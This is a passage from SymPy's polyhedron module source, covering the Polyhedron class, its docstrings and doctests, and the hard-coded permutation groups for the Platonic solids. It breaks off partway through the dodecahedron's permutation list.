[1] http://mathworld.wolfram.com/PolyhedralGroup.html\n\n \"\"\"\n _edges = None\n\n def __new__(cls, corners, faces=[], pgroup=[]):\n \"\"\"\n The constructor of the Polyhedron group object.\n\n Explanation\n ===========\n\n It takes up to three parameters: the corners, faces, and\n allowed transformations.\n\n The corners/vertices are entered as a list of arbitrary\n expressions that are used to identify each vertex.\n\n The faces are entered as a list of tuples of indices; a tuple\n of indices identifies the vertices which define the face. They\n should be entered in a cw or ccw order; they will be standardized\n by reversal and rotation to be give the lowest lexical ordering.\n If no faces are given then no edges will be computed.\n\n >>> from sympy.combinatorics.polyhedron import Polyhedron\n >>> Polyhedron(list('abc'), [(1, 2, 0)]).faces\n FiniteSet((0, 1, 2))\n >>> Polyhedron(list('abc'), [(1, 0, 2)]).faces\n FiniteSet((0, 1, 2))\n\n The allowed transformations are entered as allowable permutations\n of the vertices for the polyhedron. Instance of Permutations\n (as with faces) should refer to the supplied vertices by index.\n These permutation are stored as a PermutationGroup.\n\n Examples\n ========\n\n >>> from sympy.combinatorics.permutations import Permutation\n >>> from sympy.interactive import init_printing\n >>> from sympy.abc import w, x, y, z\n >>> init_printing(pretty_print=False, perm_cyclic=False)\n\n Here we construct the Polyhedron object for a tetrahedron.\n\n >>> corners = [w, x, y, z]\n >>> faces = [(0, 1, 2), (0, 2, 3), (0, 3, 1), (1, 2, 3)]\n\n Next, allowed transformations of the polyhedron must be given. This\n is given as permutations of vertices.\n\n Although the vertices of a tetrahedron can be numbered in 24 (4!)\n different ways, there are only 12 different orientations for a\n physical tetrahedron. The following permutations, applied once or\n twice, will generate all 12 of the orientations. (The identity\n permutation, Permutation(range(4)), is not included since it does\n not change the orientation of the vertices.)\n\n >>> pgroup = [Permutation([[0, 1, 2], [3]]), \\\n Permutation([[0, 1, 3], [2]]), \\\n Permutation([[0, 2, 3], [1]]), \\\n Permutation([[1, 2, 3], [0]]), \\\n Permutation([[0, 1], [2, 3]]), \\\n Permutation([[0, 2], [1, 3]]), \\\n Permutation([[0, 3], [1, 2]])]\n\n The Polyhedron is now constructed and demonstrated:\n\n >>> tetra = Polyhedron(corners, faces, pgroup)\n >>> tetra.size\n 4\n >>> tetra.edges\n FiniteSet((0, 1), (0, 2), (0, 3), (1, 2), (1, 3), (2, 3))\n >>> tetra.corners\n (w, x, y, z)\n\n It can be rotated with an arbitrary permutation of vertices, e.g.\n the following permutation is not in the pgroup:\n\n >>> tetra.rotate(Permutation([0, 1, 3, 2]))\n >>> tetra.corners\n (w, x, z, y)\n\n An allowed permutation of the vertices can be constructed by\n repeatedly applying permutations from the pgroup to the vertices.\n Here is a demonstration that applying p and p**2 for every p in\n pgroup generates all the orientations of a tetrahedron and no others:\n\n >>> all = ( (w, x, y, z), \\\n (x, y, w, z), \\\n (y, w, x, z), \\\n (w, z, x, y), \\\n (z, w, y, x), \\\n (w, y, z, x), \\\n (y, z, w, x), \\\n (x, z, y, w), \\\n (z, y, x, w), \\\n (y, x, z, w), \\\n (x, w, z, y), \\\n (z, x, w, y) )\n\n >>> got = []\n >>> for p in (pgroup + [p**2 for p in pgroup]):\n ... h = Polyhedron(corners)\n ... h.rotate(p)\n ... 
got.append(h.corners)\n ...\n >>> set(got) == set(all)\n True\n\n The make_perm method of a PermutationGroup will randomly pick\n permutations, multiply them together, and return the permutation that\n can be applied to the polyhedron to give the orientation produced\n by those individual permutations.\n\n Here, 3 permutations are used:\n\n >>> tetra.pgroup.make_perm(3) # doctest: +SKIP\n Permutation([0, 3, 1, 2])\n\n To select the permutations that should be used, supply a list\n of indices to the permutations in pgroup in the order they should\n be applied:\n\n >>> use = [0, 0, 2]\n >>> p002 = tetra.pgroup.make_perm(3, use)\n >>> p002\n Permutation([1, 0, 3, 2])\n\n\n Apply them one at a time:\n\n >>> tetra.reset()\n >>> for i in use:\n ... tetra.rotate(pgroup[i])\n ...\n >>> tetra.vertices\n (x, w, z, y)\n >>> sequentially = tetra.vertices\n\n Apply the composite permutation:\n\n >>> tetra.reset()\n >>> tetra.rotate(p002)\n >>> tetra.corners\n (x, w, z, y)\n >>> tetra.corners in all and tetra.corners == sequentially\n True\n\n Notes\n =====\n\n Defining permutation groups\n ---------------------------\n\n It is not necessary to enter any permutations, nor is necessary to\n enter a complete set of transformations. In fact, for a polyhedron,\n all configurations can be constructed from just two permutations.\n For example, the orientations of a tetrahedron can be generated from\n an axis passing through a vertex and face and another axis passing\n through a different vertex or from an axis passing through the\n midpoints of two edges opposite of each other.\n\n For simplicity of presentation, consider a square --\n not a cube -- with vertices 1, 2, 3, and 4:\n\n 1-----2 We could think of axes of rotation being:\n | | 1) through the face\n | | 2) from midpoint 1-2 to 3-4 or 1-3 to 2-4\n 3-----4 3) lines 1-4 or 2-3\n\n\n To determine how to write the permutations, imagine 4 cameras,\n one at each corner, labeled A-D:\n\n A B A B\n 1-----2 1-----3 vertex index:\n | | | | 1 0\n | | | | 2 1\n 3-----4 2-----4 3 2\n C D C D 4 3\n\n original after rotation\n along 1-4\n\n A diagonal and a face axis will be chosen for the \"permutation group\"\n from which any orientation can be constructed.\n\n >>> pgroup = []\n\n Imagine a clockwise rotation when viewing 1-4 from camera A. The new\n orientation is (in camera-order): 1, 3, 2, 4 so the permutation is\n given using the *indices* of the vertices as:\n\n >>> pgroup.append(Permutation((0, 2, 1, 3)))\n\n Now imagine rotating clockwise when looking down an axis entering the\n center of the square as viewed. 
The new camera-order would be\n 3, 1, 4, 2 so the permutation is (using indices):\n\n >>> pgroup.append(Permutation((2, 0, 3, 1)))\n\n The square can now be constructed:\n ** use real-world labels for the vertices, entering them in\n camera order\n ** for the faces we use zero-based indices of the vertices\n in *edge-order* as the face is traversed; neither the\n direction nor the starting point matter -- the faces are\n only used to define edges (if so desired).\n\n >>> square = Polyhedron((1, 2, 3, 4), [(0, 1, 3, 2)], pgroup)\n\n To rotate the square with a single permutation we can do:\n\n >>> square.rotate(square.pgroup[0])\n >>> square.corners\n (1, 3, 2, 4)\n\n To use more than one permutation (or to use one permutation more\n than once) it is more convenient to use the make_perm method:\n\n >>> p011 = square.pgroup.make_perm([0, 1, 1]) # diag flip + 2 rotations\n >>> square.reset() # return to initial orientation\n >>> square.rotate(p011)\n >>> square.corners\n (4, 2, 3, 1)\n\n Thinking outside the box\n ------------------------\n\n Although the Polyhedron object has a direct physical meaning, it\n actually has broader application. In the most general sense it is\n just a decorated PermutationGroup, allowing one to connect the\n permutations to something physical. For example, a Rubik's cube is\n not a proper polyhedron, but the Polyhedron class can be used to\n represent it in a way that helps to visualize the Rubik's cube.\n\n >>> from sympy.utilities.iterables import flatten, unflatten\n >>> from sympy import symbols\n >>> from sympy.combinatorics import RubikGroup\n >>> facelets = flatten([symbols(s+'1:5') for s in 'UFRBLD'])\n >>> def show():\n ... pairs = unflatten(r2.corners, 2)\n ... print(pairs[::2])\n ... print(pairs[1::2])\n ...\n >>> r2 = Polyhedron(facelets, pgroup=RubikGroup(2))\n >>> show()\n [(U1, U2), (F1, F2), (R1, R2), (B1, B2), (L1, L2), (D1, D2)]\n [(U3, U4), (F3, F4), (R3, R4), (B3, B4), (L3, L4), (D3, D4)]\n >>> r2.rotate(0) # cw rotation of F\n >>> show()\n [(U1, U2), (F3, F1), (U3, R2), (B1, B2), (L1, D1), (R3, R1)]\n [(L4, L2), (F4, F2), (U4, R4), (B3, B4), (L3, D2), (D3, D4)]\n\n Predefined Polyhedra\n ====================\n\n For convenience, the vertices and faces are defined for the following\n standard solids along with a permutation group for transformations.\n When the polyhedron is oriented as indicated below, the vertices in\n a given horizontal plane are numbered in ccw direction, starting from\n the vertex that will give the lowest indices in a given face. 
(In the\n net of the vertices, indices preceded by \"-\" indicate replication of\n the lhs index in the net.)\n\n tetrahedron, tetrahedron_faces\n ------------------------------\n\n 4 vertices (vertex up) net:\n\n 0 0-0\n 1 2 3-1\n\n 4 faces:\n\n (0, 1, 2) (0, 2, 3) (0, 3, 1) (1, 2, 3)\n\n cube, cube_faces\n ----------------\n\n 8 vertices (face up) net:\n\n 0 1 2 3-0\n 4 5 6 7-4\n\n 6 faces:\n\n (0, 1, 2, 3)\n (0, 1, 5, 4) (1, 2, 6, 5) (2, 3, 7, 6) (0, 3, 7, 4)\n (4, 5, 6, 7)\n\n octahedron, octahedron_faces\n ----------------------------\n\n 6 vertices (vertex up) net:\n\n 0 0 0-0\n 1 2 3 4-1\n 5 5 5-5\n\n 8 faces:\n\n (0, 1, 2) (0, 2, 3) (0, 3, 4) (0, 1, 4)\n (1, 2, 5) (2, 3, 5) (3, 4, 5) (1, 4, 5)\n\n dodecahedron, dodecahedron_faces\n --------------------------------\n\n 20 vertices (vertex up) net:\n\n 0 1 2 3 4 -0\n 5 6 7 8 9 -5\n 14 10 11 12 13-14\n 15 16 17 18 19-15\n\n 12 faces:\n\n (0, 1, 2, 3, 4) (0, 1, 6, 10, 5) (1, 2, 7, 11, 6)\n (2, 3, 8, 12, 7) (3, 4, 9, 13, 8) (0, 4, 9, 14, 5)\n (5, 10, 16, 15, 14) (6, 10, 16, 17, 11) (7, 11, 17, 18, 12)\n (8, 12, 18, 19, 13) (9, 13, 19, 15, 14)(15, 16, 17, 18, 19)\n\n icosahedron, icosahedron_faces\n ------------------------------\n\n 12 vertices (face up) net:\n\n 0 0 0 0 -0\n 1 2 3 4 5 -1\n 6 7 8 9 10 -6\n 11 11 11 11 -11\n\n 20 faces:\n\n (0, 1, 2) (0, 2, 3) (0, 3, 4)\n (0, 4, 5) (0, 1, 5) (1, 2, 6)\n (2, 3, 7) (3, 4, 8) (4, 5, 9)\n (1, 5, 10) (2, 6, 7) (3, 7, 8)\n (4, 8, 9) (5, 9, 10) (1, 6, 10)\n (6, 7, 11) (7, 8, 11) (8, 9, 11)\n (9, 10, 11) (6, 10, 11)\n\n >>> from sympy.combinatorics.polyhedron import cube\n >>> cube.edges\n FiniteSet((0, 1), (0, 3), (0, 4), (1, 2), (1, 5), (2, 3), (2, 6), (3, 7), (4, 5), (4, 7), (5, 6), (6, 7))\n\n If you want to use letters or other names for the corners you\n can still use the pre-calculated faces:\n\n >>> corners = list('abcdefgh')\n >>> Polyhedron(corners, cube.faces).corners\n (a, b, c, d, e, f, g, h)\n\n References\n ==========\n\n .. 
[1] www.ocf.berkeley.edu/~wwu/articles/platonicsolids.pdf\n\n \"\"\"\n faces = [minlex(f, directed=False, is_set=True) for f in faces]\n corners, faces, pgroup = args = \\\n [Tuple(*a) for a in (corners, faces, pgroup)]\n obj = Basic.__new__(cls, *args)\n obj._corners = tuple(corners) # in order given\n obj._faces = FiniteSet(*faces)\n if pgroup and pgroup[0].size != len(corners):\n raise ValueError(\"Permutation size unequal to number of corners.\")\n # use the identity permutation if none are given\n obj._pgroup = PermutationGroup(\n pgroup or [Perm(range(len(corners)))] )\n return obj\n\n @property\n def corners(self):\n \"\"\"\n Get the corners of the Polyhedron.\n\n The method ``vertices`` is an alias for ``corners``.\n\n Examples\n ========\n\n >>> from sympy.combinatorics import Polyhedron\n >>> from sympy.abc import a, b, c, d\n >>> p = Polyhedron(list('abcd'))\n >>> p.corners == p.vertices == (a, b, c, d)\n True\n\n See Also\n ========\n\n array_form, cyclic_form\n \"\"\"\n return self._corners\n vertices = corners\n\n @property\n def array_form(self):\n \"\"\"Return the indices of the corners.\n\n The indices are given relative to the original position of corners.\n\n Examples\n ========\n\n >>> from sympy.combinatorics.polyhedron import tetrahedron\n >>> tetrahedron = tetrahedron.copy()\n >>> tetrahedron.array_form\n [0, 1, 2, 3]\n\n >>> tetrahedron.rotate(0)\n >>> tetrahedron.array_form\n [0, 2, 3, 1]\n >>> tetrahedron.pgroup[0].array_form\n [0, 2, 3, 1]\n\n See Also\n ========\n\n corners, cyclic_form\n \"\"\"\n corners = list(self.args[0])\n return [corners.index(c) for c in self.corners]\n\n @property\n def cyclic_form(self):\n \"\"\"Return the indices of the corners in cyclic notation.\n\n The indices are given relative to the original position of corners.\n\n See Also\n ========\n\n corners, array_form\n \"\"\"\n return Perm._af_new(self.array_form).cyclic_form\n\n @property\n def size(self):\n \"\"\"\n Get the number of corners of the Polyhedron.\n \"\"\"\n return len(self._corners)\n\n @property\n def faces(self):\n \"\"\"\n Get the faces of the Polyhedron.\n \"\"\"\n return self._faces\n\n @property\n def pgroup(self):\n \"\"\"\n Get the permutations of the Polyhedron.\n \"\"\"\n return self._pgroup\n\n @property\n def edges(self):\n \"\"\"\n Given the faces of the polyhedra we can get the edges.\n\n Examples\n ========\n\n >>> from sympy.combinatorics import Polyhedron\n >>> from sympy.abc import a, b, c\n >>> corners = (a, b, c)\n >>> faces = [(0, 1, 2)]\n >>> Polyhedron(corners, faces).edges\n FiniteSet((0, 1), (0, 2), (1, 2))\n\n \"\"\"\n if self._edges is None:\n output = set()\n for face in self.faces:\n for i in range(len(face)):\n edge = tuple(sorted([face[i], face[i - 1]]))\n output.add(edge)\n self._edges = FiniteSet(*output)\n return self._edges\n\n def rotate(self, perm):\n \"\"\"\n Apply a permutation to the polyhedron *in place*. The permutation\n may be given as a Permutation instance or an integer indicating\n which permutation from pgroup of the Polyhedron should be\n applied.\n\n This is an operation that is analogous to rotation about\n an axis by a fixed increment.\n\n Notes\n =====\n\n When a Permutation is applied, no check is done to see if that\n is a valid permutation for the Polyhedron. For example, a cube\n could be given a permutation which effectively swaps only 2\n vertices. A valid permutation (that rotates the object in a\n physical way) will be obtained if one only uses\n permutations from the ``pgroup`` of the Polyhedron. 
On the other\n hand, allowing arbitrary rotations (applications of permutations)\n gives a way to follow named elements rather than indices since\n Polyhedron allows vertices to be named while Permutation works\n only with indices.\n\n Examples\n ========\n\n >>> from sympy.combinatorics import Polyhedron, Permutation\n >>> from sympy.combinatorics.polyhedron import cube\n >>> cube = cube.copy()\n >>> cube.corners\n (0, 1, 2, 3, 4, 5, 6, 7)\n >>> cube.rotate(0)\n >>> cube.corners\n (1, 2, 3, 0, 5, 6, 7, 4)\n\n A non-physical \"rotation\" that is not prohibited by this method:\n\n >>> cube.reset()\n >>> cube.rotate(Permutation([[1, 2]], size=8))\n >>> cube.corners\n (0, 2, 1, 3, 4, 5, 6, 7)\n\n Polyhedron can be used to follow elements of set that are\n identified by letters instead of integers:\n\n >>> shadow = h5 = Polyhedron(list('abcde'))\n >>> p = Permutation([3, 0, 1, 2, 4])\n >>> h5.rotate(p)\n >>> h5.corners\n (d, a, b, c, e)\n >>> _ == shadow.corners\n True\n >>> copy = h5.copy()\n >>> h5.rotate(p)\n >>> h5.corners == copy.corners\n False\n \"\"\"\n if not isinstance(perm, Perm):\n perm = self.pgroup[perm]\n # and we know it's valid\n else:\n if perm.size != self.size:\n raise ValueError('Polyhedron and Permutation sizes differ.')\n a = perm.array_form\n corners = [self.corners[a[i]] for i in range(len(self.corners))]\n self._corners = tuple(corners)\n\n def reset(self):\n \"\"\"Return corners to their original positions.\n\n Examples\n ========\n\n >>> from sympy.combinatorics.polyhedron import tetrahedron as T\n >>> T = T.copy()\n >>> T.corners\n (0, 1, 2, 3)\n >>> T.rotate(0)\n >>> T.corners\n (0, 2, 3, 1)\n >>> T.reset()\n >>> T.corners\n (0, 1, 2, 3)\n \"\"\"\n self._corners = self.args[0]\n\n\ndef _pgroup_calcs():\n \"\"\"Return the permutation groups for each of the polyhedra and the face\n definitions: tetrahedron, cube, octahedron, dodecahedron, icosahedron,\n tetrahedron_faces, cube_faces, octahedron_faces, dodecahedron_faces,\n icosahedron_faces\n\n Explanation\n ===========\n\n (This author didn't find and didn't know of a better way to do it though\n there likely is such a way.)\n\n Although only 2 permutations are needed for a polyhedron in order to\n generate all the possible orientations, a group of permutations is\n provided instead. A set of permutations is called a \"group\" if::\n\n a*b = c (for any pair of permutations in the group, a and b, their\n product, c, is in the group)\n\n a*(b*c) = (a*b)*c (for any 3 permutations in the group associativity holds)\n\n there is an identity permutation, I, such that I*a = a*I for all elements\n in the group\n\n a*b = I (the inverse of each permutation is also in the group)\n\n None of the polyhedron groups defined follow these definitions of a group.\n Instead, they are selected to contain those permutations whose powers\n alone will construct all orientations of the polyhedron, i.e. for\n permutations ``a``, ``b``, etc... in the group, ``a, a**2, ..., a**o_a``,\n ``b, b**2, ..., b**o_b``, etc... (where ``o_i`` is the order of\n permutation ``i``) generate all permutations of the polyhedron instead of\n mixed products like ``a*b``, ``a*b**2``, etc....\n\n Note that for a polyhedron with n vertices, the valid permutations of the\n vertices exclude those that do not maintain its faces. e.g. 
the\n permutation BCDE of a square's four corners, ABCD, is a valid\n permutation while CBDE is not (because this would twist the square).\n\n Examples\n ========\n\n The is_group checks for: closure, the presence of the Identity permutation,\n and the presence of the inverse for each of the elements in the group. This\n confirms that none of the polyhedra are true groups:\n\n >>> from sympy.combinatorics.polyhedron import (\n ... tetrahedron, cube, octahedron, dodecahedron, icosahedron)\n ...\n >>> polyhedra = (tetrahedron, cube, octahedron, dodecahedron, icosahedron)\n >>> [h.pgroup.is_group for h in polyhedra]\n ...\n [True, True, True, True, True]\n\n Although tests in polyhedron's test suite check that powers of the\n permutations in the groups generate all permutations of the vertices\n of the polyhedron, here we also demonstrate the powers of the given\n permutations create a complete group for the tetrahedron:\n\n >>> from sympy.combinatorics import Permutation, PermutationGroup\n >>> for h in polyhedra[:1]:\n ... G = h.pgroup\n ... perms = set()\n ... for g in G:\n ... for e in range(g.order()):\n ... p = tuple((g**e).array_form)\n ... perms.add(p)\n ...\n ... perms = [Permutation(p) for p in perms]\n ... assert PermutationGroup(perms).is_group\n\n In addition to doing the above, the tests in the suite confirm that the\n faces are all present after the application of each permutation.\n\n References\n ==========\n\n .. [1] http://dogschool.tripod.com/trianglegroup.html\n\n \"\"\"\n def _pgroup_of_double(polyh, ordered_faces, pgroup):\n n = len(ordered_faces[0])\n # the vertices of the double which sits inside a give polyhedron\n # can be found by tracking the faces of the outer polyhedron.\n # A map between face and the vertex of the double is made so that\n # after rotation the position of the vertices can be located\n fmap = dict(zip(ordered_faces,\n range(len(ordered_faces))))\n flat_faces = flatten(ordered_faces)\n new_pgroup = []\n for i, p in enumerate(pgroup):\n h = polyh.copy()\n h.rotate(p)\n c = h.corners\n # reorder corners in the order they should appear when\n # enumerating the faces\n reorder = unflatten([c[j] for j in flat_faces], n)\n # make them canonical\n reorder = [tuple(map(as_int,\n minlex(f, directed=False, is_set=True)))\n for f in reorder]\n # map face to vertex: the resulting list of vertices are the\n # permutation that we seek for the double\n new_pgroup.append(Perm([fmap[f] for f in reorder]))\n return new_pgroup\n\n tetrahedron_faces = [\n (0, 1, 2), (0, 2, 3), (0, 3, 1), # upper 3\n (1, 2, 3), # bottom\n ]\n\n # cw from top\n #\n _t_pgroup = [\n Perm([[1, 2, 3], [0]]), # cw from top\n Perm([[0, 1, 2], [3]]), # cw from front face\n Perm([[0, 3, 2], [1]]), # cw from back right face\n Perm([[0, 3, 1], [2]]), # cw from back left face\n Perm([[0, 1], [2, 3]]), # through front left edge\n Perm([[0, 2], [1, 3]]), # through front right edge\n Perm([[0, 3], [1, 2]]), # through back edge\n ]\n\n tetrahedron = Polyhedron(\n range(4),\n tetrahedron_faces,\n _t_pgroup)\n\n cube_faces = [\n (0, 1, 2, 3), # upper\n (0, 1, 5, 4), (1, 2, 6, 5), (2, 3, 7, 6), (0, 3, 7, 4), # middle 4\n (4, 5, 6, 7), # lower\n ]\n\n # U, D, F, B, L, R = up, down, front, back, left, right\n _c_pgroup = [Perm(p) for p in\n [\n [1, 2, 3, 0, 5, 6, 7, 4], # cw from top, U\n [4, 0, 3, 7, 5, 1, 2, 6], # cw from F face\n [4, 5, 1, 0, 7, 6, 2, 3], # cw from R face\n\n [1, 0, 4, 5, 2, 3, 7, 6], # cw through UF edge\n [6, 2, 1, 5, 7, 3, 0, 4], # cw through UR edge\n [6, 7, 3, 2, 5, 4, 0, 1], # cw 
through UB edge\n [3, 7, 4, 0, 2, 6, 5, 1], # cw through UL edge\n [4, 7, 6, 5, 0, 3, 2, 1], # cw through FL edge\n [6, 5, 4, 7, 2, 1, 0, 3], # cw through FR edge\n\n [0, 3, 7, 4, 1, 2, 6, 5], # cw through UFL vertex\n [5, 1, 0, 4, 6, 2, 3, 7], # cw through UFR vertex\n [5, 6, 2, 1, 4, 7, 3, 0], # cw through UBR vertex\n [7, 4, 0, 3, 6, 5, 1, 2], # cw through UBL\n ]]\n\n cube = Polyhedron(\n range(8),\n cube_faces,\n _c_pgroup)\n\n octahedron_faces = [\n (0, 1, 2), (0, 2, 3), (0, 3, 4), (0, 1, 4), # top 4\n (1, 2, 5), (2, 3, 5), (3, 4, 5), (1, 4, 5), # bottom 4\n ]\n\n octahedron = Polyhedron(\n range(6),\n octahedron_faces,\n _pgroup_of_double(cube, cube_faces, _c_pgroup))\n\n dodecahedron_faces = [\n (0, 1, 2, 3, 4), # top\n (0, 1, 6, 10, 5), (1, 2, 7, 11, 6), (2, 3, 8, 12, 7), # upper 5\n (3, 4, 9, 13, 8), (0, 4, 9, 14, 5),\n (5, 10, 16, 15, 14), (6, 10, 16, 17, 11), (7, 11, 17, 18,\n 12), # lower 5\n (8, 12, 18, 19, 13), (9, 13, 19, 15, 14),\n (15, 16, 17, 18, 19) # bottom\n ]\n\n def _string_to_perm(s):\n rv = [Perm(range(20))]\n p = None\n for si in s:\n if si not in '01':\n count = int(si) - 1\n else:\n count = 1\n if si == '0':\n p = _f0\n elif si == '1':\n p = _f1\n rv.extend([p]*count)\n return Perm.rmul(*rv)\n\n # top face cw\n _f0 = Perm([\n 1, 2, 3, 4, 0, 6, 7, 8, 9, 5, 11,\n 12, 13, 14, 10, 16, 17, 18, 19, 15])\n # front face cw\n _f1 = Perm([\n 5, 0, 4, 9, 14, 10, 1, 3, 13, 15,\n 6, 2, 8, 19, 16, 17, 11, 7, 12, 18])\n # the strings below, like 0104 are shorthand for F0*F1*F0**4 and are\n # the remaining 4 face rotations, 15 edge permutations, and the\n # 10 vertex rotations.\n _dodeca_pgroup = [_f0, _f1] + [_string_to_perm(s) for s in '''\n 0104 140 014 0410\n 010 1403 03104 04103 102\n 120 1304 01303 021302 03130\n 0412041 041204103 04120410 041204104 041204102\n 10 01 1402 0140 04102 0412 1204 1302 0130 03120'''.strip().split()]\n\n dodecahedron = Polyhedron(\n range(20),\n dodecahedron_faces,\n _dodeca_pgroup)\n\n icosahedron_faces = [\n (0, 1, 2), (0, 2, 3), (0, 3, 4), (0, 4, 5), (0, 1, 5),\n (1, 6, 7), (1, 2, 7), (2, 7, 8), (2, 3, 8), (3, 8, 9),\n (3, 4, 9), (4, 9, 10), (4, 5, 10), (5, 6, 10), (1, 5, 6),\n (6, 7, 11), (7, 8, 11), (8, 9, 11), (9, 10, 11), (6, 10, 11)]\n\n icosahedron = Polyhedron(\n range(12),\n icosahedron_faces,\n _pgroup_of_double(\n dodecahedron, dodecahedron_faces, _dodeca_pgroup))\n\n return (tetrahedron, cube, octahedron, dodecahedron, icosahedron,\n tetrahedron_faces, cube_faces, octahedron_faces,\n dodecahedron_faces, icosahedron_faces)\n\n# -----------------------------------------------------------------------\n# Standard Polyhedron groups\n#\n# These are generated using _pgroup_calcs() above. 
However to save\n# import time we encode them explicitly here.\n# -----------------------------------------------------------------------\n\ntetrahedron = Polyhedron(\n Tuple(0, 1, 2, 3),\n Tuple(\n Tuple(0, 1, 2),\n Tuple(0, 2, 3),\n Tuple(0, 1, 3),\n Tuple(1, 2, 3)),\n Tuple(\n Perm(1, 2, 3),\n Perm(3)(0, 1, 2),\n Perm(0, 3, 2),\n Perm(0, 3, 1),\n Perm(0, 1)(2, 3),\n Perm(0, 2)(1, 3),\n Perm(0, 3)(1, 2)\n ))\n\ncube = Polyhedron(\n Tuple(0, 1, 2, 3, 4, 5, 6, 7),\n Tuple(\n Tuple(0, 1, 2, 3),\n Tuple(0, 1, 5, 4),\n Tuple(1, 2, 6, 5),\n Tuple(2, 3, 7, 6),\n Tuple(0, 3, 7, 4),\n Tuple(4, 5, 6, 7)),\n Tuple(\n Perm(0, 1, 2, 3)(4, 5, 6, 7),\n Perm(0, 4, 5, 1)(2, 3, 7, 6),\n Perm(0, 4, 7, 3)(1, 5, 6, 2),\n Perm(0, 1)(2, 4)(3, 5)(6, 7),\n Perm(0, 6)(1, 2)(3, 5)(4, 7),\n Perm(0, 6)(1, 7)(2, 3)(4, 5),\n Perm(0, 3)(1, 7)(2, 4)(5, 6),\n Perm(0, 4)(1, 7)(2, 6)(3, 5),\n Perm(0, 6)(1, 5)(2, 4)(3, 7),\n Perm(1, 3, 4)(2, 7, 5),\n Perm(7)(0, 5, 2)(3, 4, 6),\n Perm(0, 5, 7)(1, 6, 3),\n Perm(0, 7, 2)(1, 4, 6)))\n\noctahedron = Polyhedron(\n Tuple(0, 1, 2, 3, 4, 5),\n Tuple(\n Tuple(0, 1, 2),\n Tuple(0, 2, 3),\n Tuple(0, 3, 4),\n Tuple(0, 1, 4),\n Tuple(1, 2, 5),\n Tuple(2, 3, 5),\n Tuple(3, 4, 5),\n Tuple(1, 4, 5)),\n Tuple(\n Perm(5)(1, 2, 3, 4),\n Perm(0, 4, 5, 2),\n Perm(0, 1, 5, 3),\n Perm(0, 1)(2, 4)(3, 5),\n Perm(0, 2)(1, 3)(4, 5),\n Perm(0, 3)(1, 5)(2, 4),\n Perm(0, 4)(1, 3)(2, 5),\n Perm(0, 5)(1, 4)(2, 3),\n Perm(0, 5)(1, 2)(3, 4),\n Perm(0, 4, 1)(2, 3, 5),\n Perm(0, 1, 2)(3, 4, 5),\n Perm(0, 2, 3)(1, 5, 4),\n Perm(0, 4, 3)(1, 5, 2)))\n\ndodecahedron = Polyhedron(\n Tuple(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19),\n Tuple(\n Tuple(0, 1, 2, 3, 4),\n Tuple(0, 1, 6, 10, 5),\n Tuple(1, 2, 7, 11, 6),\n Tuple(2, 3, 8, 12, 7),\n Tuple(3, 4, 9, 13, 8),\n Tuple(0, 4, 9, 14, 5),\n Tuple(5, 10, 16, 15, 14),\n Tuple(6, 10, 16, 17, 11),\n Tuple(7, 11, 17, 18, 12),\n Tuple(8, 12, 18, 19, 13),\n Tuple(9, 13, 19, 15, 14),\n Tuple(15, 16, 17, 18, 19)),\n Tuple(\n Perm(0, 1, 2, 3, 4)(5, 6, 7, 8, 9)(10, 11, 12, 13, 14)(15, 16, 17, 18, 19),\n Perm(0, 5, 10, 6, 1)(2, 4, 14, 16, 11)(3, 9, 15, 17, 7)(8, 13, 19, 18, 12),\n Perm(0, 10, 17, 12, 3)(1, 6, 11, 7, 2)(4, 5, 16, 18, 8)(9, 14, 15, 19, 13),\n Perm(0, 6, 17, 19, 9)(1, 11, 18, 13, 4)(2, 7, 12, 8, 3)(5, 10, 16, 15, 14),\n Perm(0, 2, 12, 19, 14)(1, 7, 18, 15, 5)(3, 8, 13, 9, 4)(6, 11, 17, 16, 10),\n Perm(0, 4, 9, 14, 5)(1, 3, 13, 15, 10)(2, 8, 19, 16, 6)(7, 12, 18, 17, 11),\n Perm(0, 1)(2, 5)(3, 10)(4, 6)(7, 14)(8, 16)(9, 11)(12, 15)(13, 17)(18, 19),\n Perm(0, 7)(1, 2)(3, 6)(4, 11)(5, 12)(8, 10)(9, 17)(13, 16)(14, 18)(15, 19),\n Perm(0, 12)(1, 8)(2, 3)(4, 7)(5, 18)(6, 13)(9, 11)(10, 19)(14, 17)(15, 16),\n Perm(0, 8)(1, 13)(2, 9)(3, 4)(5, 12)(6, 19)(7, 14)(10, 18)(11, 15)(16, 17),\n Perm(0, 4)(1, 9)(2, 14)(3, 5)(6, 13)(7, 15)(8, 10)(11, 19)(12, 16)(17, 18),\n Perm(0, 5)(1, 14)(2, 15)(3, 16)(4, 10)(6, 9)(7, 19)(8, 17)(11, 13)(12, 18),\n Perm(0, 11)(1, 6)(2, 10)(3, 16)(4, 17)(5, 7)(8, 15)(9, 18)(12, 14)(13, 19),\n Perm(0, 18)(1, 12)(2, 7)(3, 11)(4, 17)(5, 19)(6, 8)(9, 16)(10, 13)(14, 15),\n Perm(0, 18)(1, 19)(2, 13)(3, 8)(4, 12)(5, 17)(6, 15)(7, 9)(10, 16)(11, 14),\n Perm(0, 13)(1, 19)(2, 15)(3, 14)(4, 9)(5, 8)(6, 18)(7, 16)(10, 12)(11, 17),\n Perm(0, 16)(1, 15)(2, 19)(3, 18)(4, 17)(5, 10)(6, 14)(7, 13)(8, 12)(9, 11),\n Perm(0, 18)(1, 17)(2, 16)(3, 15)(4, 19)(5, 12)(6, 11)(7, 10)(8, 14)(9, 13),\n Perm(0, 15)(1, 19)(2, 18)(3, 17)(4, 16)(5, 14)(6, 13)(7, 12)(8, 11)(9, 10),\n Perm(0, 17)(1, 16)(2, 15)(3, 19)(4, 18)(5, 11)(6, 10)(7, 14)(8, 13)(9, 
